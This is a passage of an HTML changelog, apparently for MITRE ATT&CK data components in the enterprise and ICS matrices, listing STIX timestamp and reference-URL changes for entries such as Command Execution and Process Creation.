Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-02-23 19:38:20.657000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.775000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0083</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0083</td></tr></tbody></table></details><hr><h4>[DC0064] Command Execution</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 19:47:16.123000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.774000+00:00</td></tr></tbody></table></details><hr><h4>[DC0055] File Access</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:39:07.536000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.770000+00:00</td></tr></tbody></table></details><hr><h4>[DC0039] File Creation</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 17:17:05.280000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.770000+00:00</td></tr></tbody></table></details><hr><h4>[DC0040] File Deletion</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:19:16.114000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.778000+00:00</td></tr></tbody></table></details><hr><h4>[DC0059] File Metadata</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:33:47.956000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.774000+00:00</td></tr></tbody></table></details><hr><h4>[DC0061] File Modification</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 16:41:53.549000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.775000+00:00</td></tr></tbody></table></details><hr><h4>[DC0018] Host Status</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-20 18:17:23.974000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.775000+00:00</td></tr></tbody></table></details><hr><h4>[DC0016] Module Load</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-29 17:21:27.873000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.778000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0016</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0016</td></tr></tbody></table></details><hr><h4>[DC0113] Network Communication</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-11 15:52:58.538000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.774000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0113</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0113</td></tr></tbody></table></details><hr><h4>[DC0082] Network Connection Creation</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:37:33.992000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.770000+00:00</td></tr></tbody></table></details><hr><h4>[DC0085] Network Traffic Content</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 14:48:50.367000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.771000+00:00</td></tr></tbody></table></details><hr><h4>[DC0078] Network Traffic Flow</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-09 17:32:30.362000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.777000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0078</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0078</td></tr></tbody></table></details><hr><h4>[DC0021] OS API Execution</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:22:40.476000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.775000+00:00</td></tr></tbody></table></details><hr><h4>[DC0035] Process Access</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-02-23 18:45:08.713000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.770000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0035</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0035</td></tr></tbody></table></details><hr><h4>[DC0032] Process Creation</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-13 15:49:16.424000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.773000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0032</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0032</td></tr></tbody></table></details><hr><h4>[DC0034] Process Metadata</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 17:01:33.771000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.778000+00:00</td></tr></tbody></table></details><hr><h4>[DC0115] Protected Configuration</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-13 23:45:27.570000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.774000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0115</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0115</td></tr></tbody></table></details><hr><h4>[DC0001] Scheduled Job Creation</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-09 17:05:23.355000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.778000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0001</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0001</td></tr></tbody></table></details><hr><h4>[DC0117] System Notifications</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-10 15:59:54.007000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.778000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0117</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0117</td></tr></tbody></table></details><hr><h4>[DC0118] System Settings</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-08 20:14:04.248000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.773000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0118</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0118</td></tr></tbody></table></details><hr><h4>[DC0002] User Account Authentication</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 19:47:33.610000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.777000+00:00</td></tr></tbody></table></details></details><h3>ics-attack</h3><details><summary>Patches</summary><hr><h4>[DC0038] Application Log Content</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 19:46:47.171000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.776000+00:00</td></tr></tbody></table></details><hr><h4>[DC0064] Command Execution</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 19:47:16.123000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.774000+00:00</td></tr></tbody></table></details><hr><h4>[DC0055] File Access</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:39:07.536000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.770000+00:00</td></tr></tbody></table></details><hr><h4>[DC0039] File Creation</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 17:17:05.280000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.770000+00:00</td></tr></tbody></table></details><hr><h4>[DC0040] File Deletion</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:19:16.114000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.778000+00:00</td></tr></tbody></table></details><hr><h4>[DC0059] File Metadata</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:33:47.956000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.774000+00:00</td></tr></tbody></table></details><hr><h4>[DC0061] File Modification</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 16:41:53.549000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.775000+00:00</td></tr></tbody></table></details><hr><h4>[DC0016] Module Load</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-29 17:21:27.873000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.778000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0016</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0016</td></tr></tbody></table></details><hr><h4>[DC0082] Network Connection Creation</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:37:33.992000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.770000+00:00</td></tr></tbody></table></details><hr><h4>[DC0085] Network Traffic Content</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 14:48:50.367000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.771000+00:00</td></tr></tbody></table></details><hr><h4>[DC0078] Network Traffic Flow</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-09 17:32:30.362000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.777000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0078</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0078</td></tr></tbody></table></details><hr><h4>[DC0021] OS API Execution</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:22:40.476000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.775000+00:00</td></tr></tbody></table></details><hr><h4>[DC0032] Process Creation</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-13 15:49:16.424000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.773000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0032</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0032</td></tr></tbody></table></details><hr><h4>[DC0107] Process History/Live Data</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 14:51:44.669000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.775000+00:00</td></tr></tbody></table></details><hr><h4>[DC0034] Process Metadata</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 17:01:33.771000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.778000+00:00</td></tr></tbody></table></details><hr><h4>[DC0109] Process/Event Alarm</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 15:07:16.930000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.773000+00:00</td></tr></tbody></table></details><hr><h4>[DC0001] Scheduled Job Creation</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-09 17:05:23.355000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.778000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>external_references[0]['url']</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/data-components/DC0001</td><td style='border: 1px solid black;border-collapse: collapse;'>https://attack.mitre.org/datacomponents/DC0001</td></tr></tbody></table></details><hr><h4>[DC0041] Service Metadata</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 16:59:19.254000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.774000+00:00</td></tr></tbody></table></details><hr><h4>[DC0065] Service Modification</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th 